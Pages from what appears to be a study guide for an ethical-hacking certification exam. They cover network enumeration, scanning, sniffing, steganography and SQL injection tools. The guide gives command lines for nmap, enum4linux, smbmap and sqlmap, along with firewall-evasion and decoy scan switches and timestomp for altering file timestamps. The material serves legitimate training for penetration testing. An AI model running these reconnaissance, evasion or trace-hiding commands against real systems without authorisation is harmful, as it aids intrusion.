---------------------------------------------------------------------------------------------------------------------------- Enumeration is defined as the **process of extracting user names, machine names, network resources, shares, and services from a system**. The gathered information is used to identify the vulnerabilities or weak points in system security and try to exploit them in the system gaining phase. Enumeration belongs to the first phase of Ethical Hacking, i.e., “Information Gathering”. This is a process where the attacker establishes an active connection with the victim and try to discover as many attack vectors as possible, which can be used to exploit the systems further. Enumeration can be used to gain information on * Network shares * SNMP data, if they are not secured properly * IP tables * Usernames of different systems * Passwords policies lists Enumerations depend on the services that the systems offer. They can be − * DNS enumeration * NTP enumeration * SNMP enumeration * Linux/Windows enumeration * SMB enumeration [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/enumeration#netbios) netBIOS ------------------------------------------------------------------------------------------------------------------ NetBIOS is an acronym for Network Basic Input/Output System. It provides services related to the session layer of the OSI model allowing applications on separate computers to communicate over a local area network. As strictly an API, NetBIOS is not a networking protocol. There are different types of commands and tools to enumerate netBIOS. ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/enumeration#nbtstat) nbtstat * Displays NetBIOS over TCP/IP (NetBT) protocol statistics, NetBIOS name tables for both the local computer and remote computers, and the NetBIOS name cache. * This command also allows a refresh of the NetBIOS name cache and the names registered with Windows Internet Name Service (WINS). Used without parameters, this command displays Help information. * This command is available only if the Internet Protocol (TCP/IP) protocol is installed as a component in the properties of a network adapter in Network Connections. Display All the name Display Name Cache use * To display all the NETBIOS name tables of the Remote Windows Computer Copy nbtstat -a 10.10.10.x * Display NETBIOS name cache of Windows Computer Copy nbtstat -c 10.10.10.x * use the NETBIOS share on Windows Computer Copy Copy net use [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Flearn.microsoft.com%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=c8bd4d70&sv=2)nbtstatMicrosoftLearn](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/nbtstat) Official Microsoft Documentation on nbtstat Code Type Meaning <1B> UNIQUE Domain master browser <1C> UNIQUE Domain controller <1D> GROUP Master browser for subnet <00> UNIQUE Hostname <00> GROUP Domain name <03> UNIQUE Service running on system <20> UNIQUE Server service running ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/enumeration#netbios-enumerator) NETBIOS Enumerator * NetBIOS Enumerator tool is a **GUI based windows tool** used to enumerate the information of the windows remote machine * Pass the IP range to scan and then the work starts ![](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2F146382273-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FTnYLydS0JgZzHeOY4n38%252Fuploads%252FhOqY6CVs7QHeNFdCDmfb%252FnetBIOS_Enumerator.gif%3Falt%3Dmedia%26token%3De5d2d7c4-53b7-4cf4-ac4c-541941d67101&width=768&dpr=3&quality=100&sign=f1908820&sv=2) [http://nbtenum.sourceforge.net/](http://nbtenum.sourceforge.net/) [NetBIOS Enumeratornbtenum.sourceforge.net](http://nbtenum.sourceforge.net/) ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/enumeration#nmap) Nmap Port **137** is utilized by the **NetBIOS Name service**. Port **139** is used by **SMB** dialects that communicate over NetBIOS. Copy nmap -sV -v --script nbstat.nse 10.10.10.10 nmap -sU -p 137 --script nbstat.nse 10.10.10.10 [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/enumeration#snmp) SNMP ------------------------------------------------------------------------------------------------------------ Simple Network Management Protocol (SNMP) is **a networking protocol used for the management and monitoring of network-connected devices in Internet Protocol networks**. It is an application layer protocol in the OSI model framework. Typically, the SNMP protocol is implemented using the User Datagram Protocol (UDP). **Simple Network Management Protocol (SNMP)** lives on Port number: **161** ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/enumeration#snmp-check) **snmp-check** * snmp-check is a tool used to check whether the respective server is vulnerable to SNMP Attacks. * If the server is vulnerable then the snmp-check enumerate the information of that machine. Copy snmp-check 10.10.10.x [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fwww.kali.org%2Fimages%2Ffavicon.png&width=20&dpr=3&quality=100&sign=cb792676&sv=2)snmpcheck | Kali Linux ToolsKali Linux](https://www.kali.org/tools/snmpcheck) ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/enumeration#softperfect-network-scanner) SoftPerfect Network Scanner * SNMP SoftPacket Network Scanner is a GUI based windows tool. * Steps to initialize: * Click options menu → Remote SNMP→ Mark All/None. * Pass the IPV4 Range on the input field and start scanning. ![](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2F146382273-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FTnYLydS0JgZzHeOY4n38%252Fuploads%252FbKvIkNLHbzsJn9h5ov25%252FsoftPerfect%2520Network%2520Scanner.png%3Falt%3Dmedia%26token%3D664ebe1b-30ff-4f25-b2e1-49422f1aabe6&width=768&dpr=3&quality=100&sign=58c4cf43&sv=2) [https://www.softperfect.com/products/networkscanner/](https://www.softperfect.com/products/networkscanner/) [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fwww.softperfect.com%2Fimg%2Ficon-apple.png&width=20&dpr=3&quality=100&sign=d0ced45e&sv=2)SoftPerfect Network Scanner : fast, flexible, advancedwww.softperfect.com](https://www.softperfect.com/products/networkscanner) [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/enumeration#ldap) LDAP ------------------------------------------------------------------------------------------------------------ LDAP (Lightweight Directory Access Protocol) is an open and cross-platform protocol used for directory services authentication. Directory services store the users, passwords, and computer accounts, and share that information with other entities on the network. **Lightweight Directory Access Protocol (LDAP)** lives on Port number: **389** **Lightweight Directory Access Protocol / Secure (LDAP/S)** lives on Port number: **636** ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/enumeration#a-d-explorer) AD Explorer * AD Explorer is a Windows tool used to enumerate a domain that has LDAP misconfiguration. * Use this tool to get the data of the Active Directory. > **Active Directory Explorer (AD Explorer)** is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database, define favorite locations, view object properties and attributes without having to open dialog boxes, edit permissions, view an object's schema, and execute sophisticated searches that you can save and re-execute. ![](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2F146382273-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FTnYLydS0JgZzHeOY4n38%252Fuploads%252FUrTpBcIRHl2dN3u2uCmo%252FADExplorer-860x520.png%3Falt%3Dmedia%26token%3D652111cf-1793-4717-b074-b20d1562c474&width=768&dpr=3&quality=100&sign=aa2b14d0&sv=2) [https://www.zubairalexander.com/blog/active-directory-explorer/](https://www.zubairalexander.com/blog/active-directory-explorer/) [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Flearn.microsoft.com%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=c8bd4d70&sv=2)AD Explorer - SysinternalsMicrosoftLearn](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer) Official Microsoft Link for the tool [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/enumeration#nfs) NFS ---------------------------------------------------------------------------------------------------------- **The Network File System (NFS)** is a **mechanism for storing files on a network**. It is a distributed file system that allows users to access files and directories located on remote computers and treat those files and directories as if they were local. **Network File System (NFS)** runs on port number: **2049** ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/enumeration#nmap-script) Nmap Script Copy nmap -p 2049 10.10.10.x ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/enumeration#superenum) SuperEnum * Super Enum is a Linux based tool * **Steps:** * Create a file "Target.txt" and add the target IP address. * Run script ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/enumeration#rpc-scan) RPC Scan * Tool to communicate with RPC services and check misconfigurations on NFS shares * RPC Scan is a Linux based tool Copy python3 rpc-scan.py 10.10.10.19 --rpc [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fgithub.com%2Ffluidicon.png&width=20&dpr=3&quality=100&sign=e9cb4944&sv=2)GitHub - hegusung/RPCScan: Tool to communicate with RPC services and check misconfigurations on NFS sharesGitHub](https://github.com/hegusung/RPCScan) [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/enumeration#dns) DNS ---------------------------------------------------------------------------------------------------------- DNS, or the Domain Name System, translates human-readable domain names (for example, www.google.com) to machine-readable IP addresses (for example, 142.251.42.68). * A few example tools for DNS Enumeration are: * Dig * nslookup * dnsrecon [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/enumeration#rpc) RPC ---------------------------------------------------------------------------------------------------------- In distributed computing, a remote procedure call is when a computer program causes a procedure to execute in a different address space, which is coded as if it were a normal procedure call, without the programmer explicitly coding the details for the remote interaction. **Remote Procedure Calls (RPC)** lives on port number: **111** [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/enumeration#smb) **SMB** -------------------------------------------------------------------------------------------------------------- In computer networking, Server Message Block, one version of which was also known as Common Internet File System, is a communication protocol for providing shared access to files and printers between nodes on a network. It also provides an authenticated inter-process communication mechanism. **Simple Message Block (SMB)** lives on port number: **139, 445** ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/enumeration#nmap-scripts) Nmap Scripts Copy nmap -p 445 --script smb-enum 10.10.10.x nmap -p 139 --script smb-enum-shares 10.10.10.x nmap -p 139 --script smb-double-pulsar-backdoor 10.10.10.X ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/enumeration#smbmap) SMBMap SMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents, upload/download functionality, file name auto-download pattern matching, and even execute remote commands. This tool was designed with pen testing in mind, and is intended to simplify searching for potentially sensitive data across large networks. [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fgithub.com%2Ffluidicon.png&width=20&dpr=3&quality=100&sign=e9cb4944&sv=2)GitHub - ShawnDEvans/smbmap: SMBMap is a handy SMB enumeration toolGitHub](https://github.com/ShawnDEvans/smbmap) Copy smbmap -R tmp -H 10.10.10.x ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/enumeration#smbclient) SMBClient smbclient is **a client that can 'talk' to an SMB/CIFS server**. Operations include things like getting files from the server to the local machine, putting files from the local machine to the server, retrieving directory information from the server and so on. Copy smbclient -L \\192.168.29.49 [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fwww.computerhope.com%2Fcdn%2Fapple-touch-icon.png&width=20&dpr=3&quality=100&sign=6a741de6&sv=2)Linux Smbclient CommandComputer Hope](https://www.computerhope.com/unix/smbclien.htm) My suggestion is to use Nmap to discover the SMP, RPC, FTP [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/enumeration#global-network-inventory) Global Network Inventory ---------------------------------------------------------------------------------------------------------------------------------------------------- Global Network Inventory is a **powerful and flexible software and hardware inventory system** that can be used as an audit scanner in an agent-free and zero deployment environment. Global Network Inventory can audit remote computers and even network appliances, including switches, network printers, document centers, etc. This tool is a GUI based windows tool that has the ability to enumerate lots of information and display it to us. If you are done with all the tools and have no clue about the target then go with this tool. ![](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2F146382273-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FTnYLydS0JgZzHeOY4n38%252Fuploads%252FA2OvcJuVfUrD2ycy2t3s%252FGNI.png%3Falt%3Dmedia%26token%3D624da4bc-462f-4d0c-96b7-12d7659922dc&width=768&dpr=3&quality=100&sign=bd3b8355&sv=2) [https://global-network-inventory.windows10compatible.com/](https://global-network-inventory.windows10compatible.com/) [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fwindows10compatible.com%2Ffavicon.svg&width=20&dpr=3&quality=100&sign=c434b7cb&sv=2)Global Network Inventory | Windows10 Compatibleglobal-network-inventory.windows10compatible.com](https://global-network-inventory.windows10compatible.com/) [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/enumeration#enum4linux) Enum4Linux ------------------------------------------------------------------------------------------------------------------------ Enum4linux is **an enumeration tool capable of detecting and extracting data from Windows and Linux operating systems**, including those that are Samba (SMB) hosts on a network. Enum4linux is capable of discovering the following: Password policies on a target. The operating system of a remote target. Copy enum4linux -A 10.10.10.26 enum4linux -u guru -p cloudflare -n 10.10.10.x enum4linux -u guru -p cloudflare -U 10.10.10.x enum4linux -u guru -p cloudflare -o 10.10.10.x enum4linux -u guru -p cloudflare -P 10.10.10.x enum4linux -u guru -p cloudflare -G 10.10.10.x enum4linux -u guru -p cloudflare -S 10.10.10.x • -U -> Enumerate the users on the share • -o -> Enumerate the Operating System of the share • -P -> Enumerate the password policy of the share • -G -> Enumerate the Group policy of the share • -S -> Enumerate the Shared policy of the share [PreviousScanning Networks](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/scanning-networks) [NextVulnerability Analysis](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/vulnerability-analysis) Last updated 4 years ago --- # Sniffing | Book of Guru HariHaraun For the complete documentation index, see [llms.txt](https://book.thegurusec.com/llms.txt) . This page is also available as [Markdown](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/sniffing.md) . [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/sniffing#introduction) Introduction ------------------------------------------------------------------------------------------------------------------------- Packet sniffing is the practice of gathering, collecting, and logging some or all packets that pass thru a computer network, regardless of how the packet is addressed. In this way, every packet, or a defined subset of packets, may be gathered for further analysis. You, as a network administrator, can use the collected data for a wide variety of purposes, like monitoring bandwidth and traffic. A packet sniffer, sometimes called a packet analyzer, is composed of two main parts. First, a network adapter that connects the sniffer to the existing network. Second, software that provides a way to log, see, or analyze the data collected by the device. [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/sniffing#wireshark) WireShark ------------------------------------------------------------------------------------------------------------------- Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education. Originally named "Ethereal," the project was renamed "Wireshark" in May 2006 due to trademark issues. I can't stress how much you need to learn Wireshark. Since this wireshark is very important from an exam point of view. So, please learn. You can Google stuff online. There are tons of video tutorials for Wireshark. * How to analyze the packets * Learn to analyze the list of IPs that had DDos attacks. * Learn to find sensitive data in the HTTP flow. [PreviousSteganography](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/steganography) [NextSQL Injection](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/sql-injection) Last updated 4 years ago --- # Steganography | Book of Guru HariHaraun For the complete documentation index, see [llms.txt](https://book.thegurusec.com/llms.txt) . This page is also available as [Markdown](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/steganography.md) . [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/steganography#introduction) Introduction ------------------------------------------------------------------------------------------------------------------------------ Steganography is the practice of concealing a message within another message or a physical object. In computing/electronic contexts, a computer file, message, image, or video is concealed within another file, message, image, or video. [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/steganography#timestomp) Timestomp ------------------------------------------------------------------------------------------------------------------------ Timestomp is a **utility co-authored** by developers James C. Foster and Vincent Liu. The software's goal is to allow for the deletion or modification of timestamp-related information in files. The "Timestomp MACE Change Proof" screenshot is a final shot of the operating system's interpretation of the modified timestamp. [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fwww.offsec.com%2F_astro%2Ffavicon.BMs0eEax.ico&width=20&dpr=3&quality=100&sign=63394985&sv=2)Metasploit Unleashed | TimeStompwww.offensive-security.com](https://www.offensive-security.com/metasploit-unleashed/timestomp) Copy timestomp seceret.txt. -m "02/11/2021 08:06:04" • -m → Modify Values • -a → Accessed • -c → Created [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/steganography#hiding-files-using-new-technology-file-system-ntfs-streams) Hiding Files using New Technology File System(NTFS) Streams --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [https://www.howtogeek.com/howto/windows-vista/stupid-geek-tricks-hide-data-in-a-secret-text-file-compartmentwww.howtogeek.com](https://www.howtogeek.com/howto/windows-vista/stupid-geek-tricks-hide-data-in-a-secret-text-file-compartment) [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/steganography#snow) Snow -------------------------------------------------------------------------------------------------------------- Snow is a free steganography tool to hide messages in text using white spaces. It takes a file from you and then hides the specified message after encrypting it using a password that you specify. You can hide any message in any text file and then simply retrieve it in an easy way. After hiding sensitive information in a text file, you can send that to any user via email or file-sharing services and then don’t worry about if someone steals the information as the message is encrypted. #### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/steganography#encryption) Encryption Copy snow -C -m "Secret Text Goes Here!" -p "magic" readme.txt readme2.txt • -m → Set your message • -p → Set your password #### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/steganography#decryption) Decryption Copy ./snow -C -p "magic" output.txt [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fwww.ilovefreesoftware.com%2Fwp-content%2Fuploads%2F2015%2F04%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=8dba3de4&sv=2)Free Steganography Tool to Hide Message in Text using White Spaceswww.ilovefreesoftware.com](https://www.ilovefreesoftware.com/01/windows/free-steganography-tool-to-hide-message-in-text-using-white-spaces.html) [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/steganography#openstego) OpenStego ------------------------------------------------------------------------------------------------------------------------ OpenStego provides two main functionalities: * **Data Hiding:** It can hide any data within a cover file (e.g. images). * **Watermarking (beta):** Watermarking files (e.g. images) with an invisible signature. It can be used to detect unauthorized file copying. [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fwww.openstego.com%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=f65567fb&sv=2)OpenStegowww.openstego.com](https://www.openstego.com/) [PreviousSystem Hacking](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/system-hacking) [NextSniffing](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/sniffing) Last updated 4 years ago --- # SQL Injection | Book of Guru HariHaraun For the complete documentation index, see [llms.txt](https://book.thegurusec.com/llms.txt) . This page is also available as [Markdown](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/sql-injection.md) . [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/sql-injection#introduction) Introduction ------------------------------------------------------------------------------------------------------------------------------ SQL injection, also known as SQLI, is **a common attack vector** that uses malicious SQL code for backend database manipulation to access information that was not intended to be displayed. This information may include any number of items, including sensitive company data, user lists, or private customer details. > **What is SQL?** > > SQL stands for **Structured Query Language**, which is a computer language for storing, manipulating, and retrieving data stored in a relational database. SQL is the standard language for Relational Database System. MS SQL Server uses T-SQL, Oracle uses PL/SQL, the MS Access version of SQL is called JET SQL (native format), etc. [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/sql-injection#basics) Basics ------------------------------------------------------------------------------------------------------------------ * You can learn SQL Injection basics from the given link below. [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fwww.w3schools.com%2Fapple-touch-icon.png&width=20&dpr=3&quality=100&sign=854aa1e4&sv=2)W3Schools.comw3schools](https://www.w3schools.com/sql/sql_injection.asp) [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fportswigger.net%2Fcontent%2Fimages%2Flogos%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=264e595b&sv=2)What is SQL Injection? Tutorial & Examples | Web Security AcademyWebSecAcademy](https://portswigger.net/web-security/sql-injection) [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/sql-injection#sql-injection-cheat-sheet) SQL Injection Cheat Sheet -------------------------------------------------------------------------------------------------------------------------------------------------------- [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fcdn.prod.website-files.com%2F689c8d2a82b96fe8bd736742%2F68d3a01b98324aedc27f1797_webclip%25201.png&width=20&dpr=3&quality=100&sign=5410a468&sv=2)SQL Injection Cheat Sheetwww.netsparker.com](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet) [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/sql-injection#sqlmap) SQLMap ------------------------------------------------------------------------------------------------------------------ * sqlmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. * It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches, from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fgithub.com%2Ffluidicon.png&width=20&dpr=3&quality=100&sign=e9cb4944&sv=2)GitHub - sqlmapproject/sqlmap: Automatic SQL injection and database takeover toolGitHub](https://github.com/sqlmapproject/sqlmap) GitHub Repo of SQLMap #### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/sql-injection#after-gaining-knowledge-of-sqlmap-you-should-need-to-know) After gaining knowledge of SQLMap, you should need to know: * Enumeration of databases * Enumeration of Tables in a Database * Dump the data from the database * Spawning an OS Shell with SQLMap [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/sql-injection#damn-small-sqli-scanner) Damn Small SQLi Scanner ---------------------------------------------------------------------------------------------------------------------------------------------------- **Damn Small SQLi Scanner** (DSSS) is a fully functional [SQL injection](https://en.wikipedia.org/wiki/SQL_injection) vulnerability scanner (supporting GET and POST parameters) written in under 100 lines of code. [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fgithub.com%2Ffluidicon.png&width=20&dpr=3&quality=100&sign=e9cb4944&sv=2)GitHub - stamparm/DSSS: Damn Small SQLi ScannerGitHub](https://github.com/stamparm/DSSS) [PreviousSniffing](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/sniffing) [NextHacking Web Applications & Servers](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/hacking-web-applications-and-servers) Last updated 4 years ago --- # Scanning Networks | Book of Guru HariHaraun For the complete documentation index, see [llms.txt](https://book.thegurusec.com/llms.txt) . This page is also available as [Markdown](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/scanning-networks.md) . [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/scanning-networks#host-discovery) Host Discovery -------------------------------------------------------------------------------------------------------------------------------------- Host discovery is usually referred to as '**Ping' scanning using a sonar** analogy. The goal is to send a packet thru to the IP address and solicit a response from the host. As such, a 'ping' can be virtually any crafted packet whatsoever, provided the adversary can identify a functional host based on its response. ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/scanning-networks#netdiscover) Netdiscover Netdiscover is a discovery tool and is built into Kali Linux 2018.2. Currently in the 03-pre-beta7 version and written by Jaime Penalba, Netdiscover can reform reconnaissance and discovery on both wireless and switched networks using ARP requests. To launch Netdiscover, type netdiscover –h to view the usage options. Should you only type the netdiscover command by itself, Netdiscover will launch a default scan.) Copy netdiscover -i (network interface name) (example: eth0 or tun0) netdiscover -i eth0 netdiscover -r 10.10.10.0/24 **eth0** may differ if you are on a VPN network. Mostly it would be **tun0** * This will help to get all available machines on the network. * Always make a habit of saving the IP of the machines since we use themin a lot. ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/scanning-networks#nmap) Nmap We can also use nmap to discover hosts in a given IP subnet. **Note:** In the upcoming section, you will learn what the nmap is and its uses are. Please refer to the below section. Copy nmap -sn 10.10.1.1-254 -vv -oA nmapHostsOutput • -sn -> Disable Port scanning • -vv -> verbose mode • -0A -> output the results in 3 types of format(nmap, gnmap, xml) [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/scanning-networks#nmap-1) Nmap -------------------------------------------------------------------------------------------------------------------- ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/scanning-networks#introduction-to-nmap) Introduction to Nmap Nmap **allows you to scan your network and discover not only everything connected to it**, but also a wide variety of information about what's connected, what services each host is operating, and so on. It was created by Gordon Lyon. It supports a large number of scanning techniques, such as UDP, TCP connect (), TCP SYN (half-open), and FTP. Nmap provides a number of features for probing computer networks, including host discovery and service and operating system detection. ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/scanning-networks#basic-command) Basic command Copy nmap -p- -sC -sV -O -A -T4 -oA nmapOutputfile 10.10.X.X • -p- -> Scans all the ports from 0 to 65535 available on the IP • -sC -> Runs default scripts • -sV -> version enumeration or service version • -O -> OS enumeration • -A -> Enumerate all the stuff as much as it can • -T4 -> fast as time 4 (default is 3) • -oA -> store the output on 3 types of format(nmap, gnmap, xml) ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/scanning-networks#cheatsheet-for-nmap) Cheatsheet for nmap This cheat sheet was prepared by [https://www.stationx.net/nmap-cheat-sheet/](https://www.stationx.net/nmap-cheat-sheet/) . You can also check out the cheatsheet. I've attached the file below👇🏻 563KB [nmap\_cheet\_sheet\_v7.pdf](https://146382273-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTnYLydS0JgZzHeOY4n38%2Fuploads%2FnfCUKi6arZHAFyiIIaZF%2Fnmap_cheet_sheet_v7.pdf?alt=media&token=18bec52d-6b10-4686-970b-579d563021a7) PDF Download[Open](https://146382273-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTnYLydS0JgZzHeOY4n38%2Fuploads%2FnfCUKi6arZHAFyiIIaZF%2Fnmap_cheet_sheet_v7.pdf?alt=media&token=18bec52d-6b10-4686-970b-579d563021a7) [https://www.stationx.net/nmap-cheat-sheet/](https://www.stationx.net/nmap-cheat-sheet/) #### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/scanning-networks#switches-in-nmap-which-you-might-need-to-know) Switches in nmap which you might need to know Switch Description \-sA ACK scan \-sF FIN scan \-sI IDLE scan \-sL DNS scan (list scan) \-sN NULL scan \-sO Protocol scan (tests which IP protocols respond) \-sP Ping scan \-sR RPC scan \-sS SYN scan \-sT TCP connect scan \-sW Window scan \-sX XMAS scan \-A OS detection, version detection, script scanning and traceroute \-PI ICMP ping \-Po No ping \-PS SYN ping \-PT TCP ping \-oA output the results in 3 types of format(nmap, gnmap, xml) \-oN Normal output \-oX XML output \-T0 through -T2 Serial scans. T0 is slowest \-T3 through -T5 Parallel scans. T3 is slowest ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/scanning-networks#port-specific-nse-scripts) Port specific NSE scripts Using NSE we can perform specific enumeration or exploitation on a host. Copy ls /usr/share/nmap/scripts/ssh* ls /usr/share/nmap/scripts/smb* ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/scanning-networks#bypassing-firewall) Bypassing Firewall Switch Example Description \-f nmap -f 10.10.10.10 \-g nmap -g 80 10.10.10.10 Port Manipulation \-mtu nmap -mtu 8 10.10.10.10 Crunching down Packets to 8 Byte \-D RND nmap -D RND:10 10.10.10.10 Perform Decoy Scan and Generates Random non-reserved IP —data 0xdeadbeef nmap 10.10.10.10 --data 0xdeadbeef Send the binary data 0's and 1's \--data-string "Ph34r my l33t skills" nmap 10.10.10.10 --data-string "Ph34r my l33t skills" Send strings as payload \--data-length 5 nmap --data-length 5 10.10.10.10 \--randomize-hosts nmap --randomize-hosts 10.10.10.10 send request to a IP from Random non-reserved IP \--badsum nmap --badsum 10.10.10.10 Sends Bad or Bongus TCP/USP Checksum [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/scanning-networks#zenmap) Zenmap ---------------------------------------------------------------------------------------------------------------------- Zenmap is the official **Nmap Security Scanner GUI**. It is a multi-platform (Linux, Windows, Mac OS X, BSD, etc.) free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users. Frequently used scans can be saved as profiles to make them easy to run repeatedly. A command creator allows interactive creation of Nmap command lines. Scan results can be saved and viewed later. Saved scan results can be compared with one another to see how they differ. The results of recent scans are stored in a searchable database. [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fnmap.org%2Fshared%2Fimages%2Ftiny-eyeicon.png&width=20&dpr=3&quality=100&sign=2c99983f&sv=2)Zenmap - Official cross-platform Nmap Security Scanner GUInmap.org](https://nmap.org/zenmap) Official Zenmap link * **I strongly recomend** you to go with [**Zenmap**](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/scanning-networks#zenmap) for the exam point of view. * When you started your exam, the first objective you have to do is that start **Zenmap (GUI Version of Nmap)** scan on your windows machine. * The reason is that in **Parrot OS** you may find it hard to parse all the IPs because the **green colour** with the terminal might overwhelm you. Instead, the [**Zenmap GUI**](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/scanning-networks#zenmap) would be useful to find out the services, OS running on that IP with a cute User Interface. * **Trust me!💪🏻** this would be the great life-changer of your exam. * I know as a penetration tester working on the terminal is cool 😎 but in the heat of the moment, the browser-based VM would make you tense. [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/scanning-networks#angry-ip-scanner) Angry IP Scanner ------------------------------------------------------------------------------------------------------------------------------------------ * Angry IP Scanner (or simply ipscan) is an open-source and cross-platform network scanner designed to be fast and simple to use. It scans IP addresses and ports as well as has [many other features](https://angryip.org/about/) . * It is widely used by network administrators and just curious users around the world, including large and small enterprises, banks, and government agencies. * It runs on Linux, Windows, and Mac OS X, possibly supporting other platforms as well. 